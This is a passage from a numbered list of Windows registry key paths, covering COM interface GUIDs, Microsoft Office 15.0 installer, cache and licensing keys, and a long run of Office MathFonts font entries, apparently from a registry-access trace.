1768. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE9-6198-11CF-8CE8-00AA006CB389",
1769. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE9-6198-11CF-8CE8-00AA006CB389\\(Default)",
1770. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5CEF5613-713D-11CE-80C9-00AA00611080",
1771. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5CEF5613-713D-11CE-80C9-00AA00611080\\(Default)",
1772. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5CEF5613-713D-11CE-80C9-00AA00611080",
1773. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5CEF5613-713D-11CE-80C9-00AA00611080\\(Default)",
1774. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\92E11A03-7358-11CE-80CB-00AA00611080",
1775. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\92E11A03-7358-11CE-80CB-00AA00611080\\(Default)",
1776. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\92E11A03-7358-11CE-80CB-00AA00611080",
1777. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\92E11A03-7358-11CE-80CB-00AA00611080\\(Default)",
1778. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC9-866C-11CF-AB7C-00AA00C08FCF",
1779. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC9-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1780. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC9-866C-11CF-AB7C-00AA00C08FCF",
1781. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC9-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1782. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC8-AF6C-11CE-9F46-00AA00574A4F",
1783. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC8-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1784. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC8-AF6C-11CE-9F46-00AA00574A4F",
1785. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC8-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1786. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\VBAFilesIntl_1033",
1787. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
1788. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
1789. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
1790. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
1791. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
1792. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
1793. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
1794. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
1795. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
1796. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
1797. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
1798. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
1799. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
1800. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
1801. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
1802. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
1803. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
1804. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
1805. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
1806. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
1807. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
1808. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
1809. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
1810. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
1811. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
1812. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
1813. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
1814. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
1815. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
1816. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
1817. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
1818. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
1819. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
1820. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
1821. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
1822. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
1823. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
1824. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
1825. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
1826. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
1827. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
1828. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
1829. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
1830. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
1831. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
1832. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
1833. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
1834. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
1835. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
1836. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
1837. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
1838. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
1839. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
1840. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
1841. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
1842. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
1843. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893",
1844. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
1845. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Licensing\\09D07EFC505F4D9CBFD5ACE3217F6654",
1846. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100A0C00000000000F01FEC\\Usage\\SpellingAndGrammarFiles_3082",
1847. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F100C0400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1036",
1848. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109F10090400000000000F01FEC\\Usage\\SpellingAndGrammarFiles_1033",
1849. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Arial Unicode MS",
1850. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Batang",
1851. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@BatangChe",
1852. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@DFKai-SB",
1853. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Dotum",
1854. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@DotumChe",
1855. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@FangSong",
1856. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Gulim",
1857. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@GulimChe",
1858. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Gungsuh",
1859. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@GungsuhChe",
1860. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@KaiTi",
1861. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Malgun Gothic",
1862. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Meiryo",
1863. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Meiryo UI",
1864. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft JhengHei",
1865. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft JhengHei UI",
1866. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft YaHei",
1867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@Microsoft YaHei UI",
1868. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU",
1869. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU_HKSCS",
1870. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU_HKSCS-ExtB",
1871. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MingLiU-ExtB",
1872. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS Gothic",
1873. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS Mincho",
1874. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS PGothic",
1875. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS PMincho",
1876. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@MS UI Gothic",
1877. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@NSimSun",
1878. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@PMingLiU",
1879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@PMingLiU-ExtB",
1880. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimHei",
1881. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimSun",
1882. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\@SimSun-ExtB",
1883. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Agency FB",
1884. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Aharoni",
1885. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Algerian",
1886. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Andalus",
1887. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Angsana New",
1888. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\AngsanaUPC",
1889. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Aparajita",
1890. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arabic Typesetting",
1891. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial",
1892. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Black",
1893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Narrow",
1894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Rounded MT Bold",
1895. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Arial Unicode MS",
1896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Baskerville Old Face",
1897. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Batang",
1898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\BatangChe",
1899. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bauhaus 93",
1900. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bell MT",
1901. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Berlin Sans FB",
1902. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Berlin Sans FB Demi",
1903. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bernard MT Condensed",
1904. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Blackadder ITC",
1905. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT",
1906. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Black",
1907. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Condensed",
1908. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bodoni MT Poster Compressed",
1909. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Book Antiqua",
1910. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bookman Old Style",
1911. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bookshelf Symbol 7",
1912. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Bradley Hand ITC",
1913. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Britannic Bold",
1914. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Broadway",
1915. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Browallia New",
1916. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\BrowalliaUPC",
1917. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Brush Script MT",
1918. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calibri",
1919. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calibri Light",
1920. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Californian FB",
1921. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Calisto MT",
1922. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cambria",
1923. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cambria Math",
1924. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Candara",
1925. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Castellar",
1926. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Centaur",
1927. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century",
1928. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century Gothic",
1929. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Century Schoolbook",
1930. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Chiller",
1931. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Colonna MT",
1932. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Comic Sans MS",
1933. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Consolas",
1934. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Constantia",
1935. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cooper Black",
1936. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Copperplate Gothic Bold",
1937. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Copperplate Gothic Light",
1938. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Corbel",
1939. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Cordia New",
1940. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\CordiaUPC",
1941. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Courier New",
1942. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Curlz MT",
1943. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DaunPenh",
1944. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\David",
1945. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DFKai-SB",
1946. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DilleniaUPC",
1947. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DokChampa",
1948. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Dotum",
1949. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\DotumChe",
1950. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Ebrima",
1951. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Edwardian Script ITC",
1952. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Elephant",
1953. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Engravers MT",
1954. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Bold ITC",
1955. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Demi ITC",
1956. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Light ITC",
1957. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Eras Medium ITC",
1958. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Estrangelo Edessa",
1959. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\EucrosiaUPC",
1960. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Euphemia",
1961. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FangSong",
1962. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Felix Titling",
1963. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Footlight MT Light",
1964. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Forte",
1965. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Book",
1966. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Demi",
1967. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Demi Cond",
1968. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Heavy",
1969. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Medium",
1970. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Franklin Gothic Medium Cond",
1971. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FrankRuehl",
1972. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\FreesiaUPC",
1973. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Freestyle Script",
1974. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\French Script MT",
1975. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gabriola",
1976. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gadugi",
1977. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Garamond",
1978. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gautami",
1979. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Georgia",
1980. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gigi",
1981. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT",
1982. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT Condensed",
1983. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans MT Ext Condensed Bold",
1984. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans Ultra Bold",
1985. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gill Sans Ultra Bold Condensed",
1986. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gisha",
1987. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gloucester MT Extra Condensed",
1988. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Goudy Old Style",
1989. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Goudy Stout",
1990. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gulim",
1991. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\GulimChe",
1992. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Gungsuh",
1993. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\GungsuhChe",
1994. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Haettenschweiler",
1995. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Harlow Solid Italic",
1996. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Harrington",
1997. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\High Tower Text",
1998. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Impact",
1999. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Imprint MT Shadow",
2000. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Informal Roman",
2001. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\IrisUPC",
2002. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Iskoola Pota",
2003. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\JasmineUPC",
2004. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Jokerman",
2005. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Juice ITC",
